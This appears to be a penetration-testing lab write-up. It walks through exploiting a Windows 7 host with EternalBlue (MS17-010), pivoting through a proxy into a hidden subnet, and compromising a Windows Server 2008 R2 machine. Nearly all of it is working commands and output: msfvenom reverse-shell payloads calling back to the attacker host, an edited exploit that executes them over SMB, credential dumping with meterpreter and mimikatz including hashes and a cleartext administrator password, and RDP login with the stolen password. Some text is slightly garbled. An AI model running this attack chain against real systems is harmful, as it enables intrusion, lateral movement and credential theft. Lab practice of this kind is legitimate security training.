win7 pivot to win2k8

We are given the credential: adminuser P@ssw0rd

Nmap results on widows xp machine

```
PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: HACK)

3389/tcp open tcpwrapped

|_ssl-date: 2019-11-22T14:41:00+00:00; 0s from scanner time.

49152/tcp open msrpc Microsoft Windows RPC

49153/tcp open msrpc Microsoft Windows RPC

49154/tcp open msrpc Microsoft Windows RPC

49155/tcp open msrpc Microsoft Windows RPC

55369/tcp open msrpc Microsoft Windows RPC

55428/tcp open msrpc Microsoft Windows RPC

MAC Address: 00:0C:29:69:E9:45 (VMware)

Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
```

```
Host script results:
 clock-skew: mean: -2h00m00s, deviation: 4h00m00s, median: 0s
 nbstat: NetBIOS name: WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:69:e9:45 (VMware)
 smb-os-discovery:
   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
   OS CPE: cpe:/o:microsoft:windows 7::spl
   Computer name: WIN7
   NetBIOS computer name: WIN7\x00
   Domain name: hack.net
   Forest name: hack.net
    FQDN: WIN7.hack.net
    System time: 2019-11-22T22:41:00+08:00
 smb-security-mode:
    account used: quest
    authentication level: user
    challenge response: supported
   message_signing: disabled (dangerous, but default)
 smb2-security-mode:
    2.02:
     Message signing enabled but not required
  smb2-time:
   date: 2019-11-22 09:41:00
   start_date: 2019-11-21 09:57:30
```

Manually exploiting eternalblue:

https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/

Test if remote machine is vulnerable to eternalblue

Creation of payload, reverse top

```
root@kali:~/pwn/win7# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.9
8 lport=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
```

Determine which shares are writable

```
[+] User SMB session establishd on 192.168.2.100...

[+] IP: 192.168.2.100:445 Name: win7vm

Disk Permissions

ADMIN$

C$

IPC$

Temp

READ, WRITE
```

Connect to windows xp remote share

```
root@kali:~/pwn/w7# smbclient //192.168.2.100/temp -U adminuser
Enter WORKGROUP\adminuser's password:
Try "help" to get a list of possible commands.
smb: \> put shell.exe
putting file shell.exe as \shell.exe (10295.9 kb/s) (average 10296.0 kb/s)
```

Confirmed that shell.exe has been uploaded successfully

```
smb: \> dir
                                       D
                                                   Fri Nov 22 10:15:25 2019
                                                0
                                       D
                                                   Fri Nov 22 10:15:25 2019
                                                0
                                      AR
 ADMINPAK-README.TXT
                                             6236
                                                   Wed Apr 2 04:29:02 2003
 adminpak.msi
                                      AR 13128192
                                                   Wed Apr
                                                            2 03:41:36 2003
 apver.vbs
                                      AR
                                            60358
                                                   Wed Apr 2 05:34:12 2003
 KMSpico setup
                                       D
                                                   Thu Nov 21 10:02:47 2019
 KMSpico setup.zip
                                       A
                                          3779915
                                                   Mon May 13 20:48:26 2019
 shell.exe
                                            73802
                                                   Fri Nov 22 10:15:25 2019
                                       A.
```

Editing of eternalblue exploit
Change username and password

```
USERNAME = 'adminuser'
PASSWORD = 'P@ssw0rd'
```

Once the exploit runs, execute a malicious reverse tcp meterpreter payload located on the temp directory

```
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

print('creating file c:\\pwned.txt on the target')

tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    service_exec(conn, r'cmd /c c:\\temp\shell.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
```

Run exploit

```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.2.98:4444

[*] Sending stage (179779 bytes) to 192.168.2.100

[*] Meterpreter session 1 opened (192.168.2.98:4444 -> 192.168.2.100:49282) at 2019-11-22 10:30:35 -0500
meterpreter >
```

Gather creds

```
meterpreter > creds_msv
[!] Not running as SYSTEM, execution may fail
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)),
meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials

"""
Username Domain LM NTLM SHA1

WIN7S HACK d23cbb9dd8a7f29fc366f5a4f443edda 3427c592196160b65628aa33a10287b387a3930a
normaluser HACK 921988ba001dc8e138f10713b629b565 ae974876d974abd805a989ebead86846 0b5811b3cb879b5bb5383b5d958ecd9f3f1cf03a
```

Sources for pivoting:

https://medium.com/swlh/metasploit-pivoting-281636b23279

https://www.hackingtutorials.org/metasploit-tutorials/metasploitable-3-port-forwarding/

https://pentest.blog/explore-hidden-networks-with-double-pivoting/

Find ip of the 2nd interface

Interface 11

Name : Intel(R) PRO/1000 MT Network Connection

Hardware MAC : 00:0c:29:69:e9:3b

MTU : 1500

IPv4 Address : 192.168.207.134

IPv4 Netmask : 255.255.255.0

Creates a route to the hidden network

meterpreter > run autoroute -s 192.168.207.0/24

- [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
- [!] Example: run post/multi/manage/autoroute OPTION=value [...]
- [*] Adding a route to 192.168.207.0/255.255.255.0...
- [+] Added route to 192.168.207.0/255.255.255.0 via 192.168.2.100
- [*] Use the -p option to list all active routes

```
Discover machines on network which are not accessible from the outside
meterpreter > run arp_scanner
Display all 284 possibilities? (y or n)
meterpreter > run arp_scanner -r 192.168.207.0/24
[*] ARP Scanning 192.168.207.0/24
[*] IP: 192.168.207.2 MAC 00:50:56:f1:09:47
[*] IP: 192.168.207.1 MAC 00:50:56:c0:00:08
[*] IP: 192.168.207.134 MAC 00:0c:29:69:e9:3b
[*] IP: 192.168.207.254 MAC 00:50:56:f3:67:00
[*] IP: 192.168.207.255 MAC 00:0c:29:69:e9:3b
meterpreter >
```

Set rhost 192.168.2.98(attacking machine ip)
Leave lport at default(1080)
Type run and press enter

```
msf5 auxiliary(server/socks4a) > options
Module options (auxiliary/server/socks4a):
          Current Setting Required Description
  Name
                                   The address to listen on
  SRVH0ST 192.168.2.98
                          yes
                                   The port to listen on.
  SRVPORT 1080
                          yes
Auxiliary action:
  Name Description
  Proxy
msf5 auxiliary(server/socks4a) > run
[*] Running module against 192.168.2.98
[*] Auxiliary module running as background job 8.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
msf5 auxiliary(server/socks4a) > jobs
Jobs
 Id
    Name
                                  Payload Payload opts
     Auxiliary: server/socks4a
 8
<u>nsf5</u> auxiliary(server/socks4a) >
```

Edit /etc/proxychains.conf

```
#
#
# proxy types: http, socks4, socks5
# (auth types supported: "basic"-http "user/pass"-socks)
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks4 192.168.2.98 1080
~
```

To scan win2008r2 machine on hidden network, use proxychains

```
oot@kali:/usr/share/nmap/scripts# proxychains nmap -sT -Pn -p445 -script smb-vuln-ms17-010.nse 192.168.207.133
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-23 06:53 EST
S-chain|-<>-192.168.2.98:1080-<>>-192.168.207.133:445-<>>-0K
Imap scan report for 192.168.207.133
Host is up (0.062s latency).
       STATE SERVICE
445/tcp open microsoft-ds
Host script results:
 smb-vuln-ms17-010:
   VULNERABLE:
   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     IDs: CVE:CVE-2017-0143
       A critical remote code execution vulnerability exists in Microsoft SMBv1
        servers (ms17-010).
     Disclosure date: 2017-03-14
     References:
       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 map done: 1 IP address (1 host up) scanned in 2.10 seconds
```

List writable share of the win2008r2 machine

Create payload specifically for the Win2008r2 machine

```
root@kali:~/pwn/w7# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.98 lport=33333 -f exe > shell_win2k8.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@kali:~/pwn/w7#
```

Upload reverse shell to Win2008r2 machine

```
root@kali:~/pwn/w7# proxychains smbclient //192.168.207.133/temp -U hack\\normaluser
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.2.98:1080-<><>-192.168.207.133:445-<><>-OK
Enter HACK\normaluser's password:
Try "help" to get a list of possible commands.
smb: \>
```

```
smb: \> put shell win2k8.exe
putting file shell win2k8.exe as \shell win2k8.exe (166.4 kb/s) (average 166.4 kb/s)
smb: \> dir
                                      D
                                               0
                                                  Sat Nov 23 08:42:11 2019
                                     D
                                                  Sat Nov 23 08:42:11 2019
                                               0
                                     AR
                                           60358
                                                  Wed Apr 2 05:34:12 2003
 apver.vbs
 python-2.7.17.msi
                                     A 19570688
                                                  Fri Nov 22 09:23:44 2019
 shell win2k8.exe
                                                  Sat Nov 23 08:42:11 2019
                                           73802
               5216767 blocks of size 4096. 2567452 blocks available
smb: \>
```

Searching for named pipes

```
Module options (auxiliary/scanner/smb/pipe auditor):
  Name
               Current Setting
                                                                                Required
               /usr/share/metasploit-framework/data/wordlists/named pipes.txt
  NAMED PIPES
                                                                                yes
               192.168.207.133
  RHOSTS
                                                                                yes
  SMBDomain
               hack
  SMBPass
               P@ssw0rd1
                                                                                no
  SMBUser
               normaluser
                                                                                no
  THREADS
                                                                                yes
msf5 auxiliary(scanner/smb/pipe auditor) > run
[+] 192.168.207.133:445 - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlo
cted_storage, \scerpc, \srvsvc, \W32TIME_ALT, \wkssvc
[*] 192.168.207.133: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
nsf5 auxiliary(scanner/smb/pipe_auditor) >
```

Re-edit the exploit file again

```
USERNAME = 'normaluser'
PASSWORD = 'P@ssw0rd1'
```

```
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    service_exec(conn, r'cmd /c c:\\temp\shell_win2k8.exe')

# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
```

Use proxychains to execute exploit to ensure traffic is routed to victim computer

```
oot@kali:~/pwn/w7# proxychains python exploit.py 192.168.207.133 netlogon
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.2.98:1080-<><>-192.168.207.133:445-<><>-0K
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM POOL SIZE: 0x5030
BRIDE TRANS SIZE: 0xfa0
CONNECTION: 0xfffffa801a26c020
SESSION: 0xfffff8a0018fade0
FLINK: 0xfffff8a005353088
InParam: 0xfffff8a00533215c
MID: 0x2503
unexpected alignment, diff: 0x20088
leak failed... try again
CONNECTION: 0xfffffa801a26c020
SESSION: 0xfffff8a0018fade0
FLINK: 0xfffff8a005365088
InParam: 0xfffff8a00535f15c
MID: 0x2503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 192.168.207.133.....
Creating service DVzl.....
Starting service DVzl.....
The NETBIOS connection with the remote host timed out.
Removing service DVzl.....
ServiceExec Error on: 192.168.207.133
Unexpected answer from server: Got 46, Expected 47
Done
```

Reverse shell popped

```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.2.98:33333
[*] Sending stage (179779 bytes) to 192.168.2.97
[*] Meterpreter session 22 opened (192.168.2.98:33333 -> 192.168.2.97:49455) at 2019-11-23 08:53:33 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

Upload mimikatz to victim machine and run mimikatz

```
C:\mimi\x64>mimikatz.exe
mimikatz.exe
 .####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
            > http://blog.gentilkiwi.com/mimikatz
 ## \ / ##
 '## v ##'
                                              ( vincent.letoux@gmail.com )
                 Vincent LE TOUX
                 > http://pingcastle.com / http://mysmartlogon.com
  '#####'
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
User Name
                     : Administrator
Domain
                     : HACK
Logon Server
Logon Time
                    : WIN2008
                    : 11/23/2019 8:34:53 PM
                    : S-1-5-21-3816458202-3420769720-3034736060-500
SID
```

msv :

[00000003] Primary

* Username : Administrator

* Domain : HACK

* LM : 99d7bed7a618f853750351884845ace4 * NTLM : 313d5d5b879ab0b9b3bbb2bb4ec9c697

* SHA1 : 2c51df2937a28743c55d2cf90c69b8e8c03d3f0e

tspkg:

* Username : Administrator

* Domain : HACK

* Password : lqwer\$#@!

wdigest :

* Username : Administrator

* Domain : HACK

* Password : lqwer\$#@!

kerberos :

* Username : Administrator

* Domain : HACK.NET * Password : lqwer\$#@!

Remote desktop to victim machine/no issues

root@kali:-/pwn/w7# proxychains rdesktop -g1440x900 -d hack -u administrator -p lqwer\$#@! 192.168.207.133
ProxyChains-3.1 (http://proxychains.sf.net)
Autoselected keyboard map en-us
|S-chain|-<>-192.168.2.98:1080-<><>-192.168.207.133:3389-<><>-0K
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-192.168.2.98:1080-<><>-192.168.207.133:3389-<><>-0K
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16

